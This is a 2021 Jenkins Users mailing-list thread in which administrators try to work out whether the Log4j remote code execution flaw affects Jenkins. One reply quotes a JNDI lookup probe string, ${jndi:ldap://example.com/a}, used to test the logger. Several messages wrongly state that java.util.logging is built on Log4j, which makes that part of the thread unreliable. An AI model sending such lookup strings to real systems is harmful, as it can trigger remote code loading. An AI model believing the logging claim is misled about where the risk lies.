Good discussion here: https://issues.jenkins.io/browse/JENKINS-67353
On Sunday, December 12, 2021 at 12:28:09 p.m. UTC-5 [email protected] wrote:

> The good news is that passing the ${jndi:ldap://example.com/a} string
> through the logger does not trigger the CVE behaviour.
>
> On Sunday, December 12, 2021 at 11:44:35 a.m. UTC-5 [email protected]
> wrote:
>
>> Running the script:
>> println(java.util.logging.Logger.class)
>>
>> does indicate that Apache logger (built on top of Log4j) is present in
>> the LTS version of Jenkins.
>>
>> On Sunday, December 12, 2021 at 11:39:55 a.m. UTC-5 [email protected]
>> wrote:
>>
>>> Hi Kritesh,
>>>
>>> Thank you for this info.
>>>
>>> The problem with that example is that Apache java.util.logging is built
>>> on top of Log4j but does not identify as such. I am not convinced that this
>>> test is sufficient.
>>>
>>> Sincerely,
>>> Randall
>>>
>>> On Sunday, December 12, 2021 at 11:34:15 a.m. UTC-5 [email protected]
>>> wrote:
>>>
>>>> I am following for the same issue… found below info on community page
>>>> regarding this vulnerability.
>>>>
>>>> https://www.jenkins.io/blog/2021/12/10/log4j2-rce-CVE-2021-44228/
>>>>
>>>>
>>>> Thanks & Regards,
>>>> Kritesh
>>>>
>>>> On Sun, Dec 12, 2021 at 9:27 AM [email protected] <[email protected]>
>>>> wrote:
>>>>
>>>>> Hi All,
>>>>>
>>>>> I am looking for any information relating to whether the Zero Days CVE
>>>>> has any impact on Jenkins or Plugins. We do know that the
>>>>> java.util.logging
>>>>> is built on log4j, but do not know whether protections are in place to
>>>>> prevent this vulnerability from being exploited, and where. For example,
>>>>> could a command in a pipeline trigger this vulnerability?
>>>>>
>>>>> This is a somewhat urgent request.
>>>>>
>>>>> Thanks,
>>>>> Randall
>>>>>
>>>>> --
>>>>> You received this message because you are subscribed to the Google
>>>>> Groups "Jenkins Users" group.
>>>>> To unsubscribe from this group and stop receiving emails from it, send
>>>>> an email to [email protected].
>>>>> To view this discussion on the web visit
>>>>> https://groups.google.com/d/msgid/jenkinsci-users/4e157a13-bfba-425a-81ae-b93cdd845f9dn%40googlegroups.com
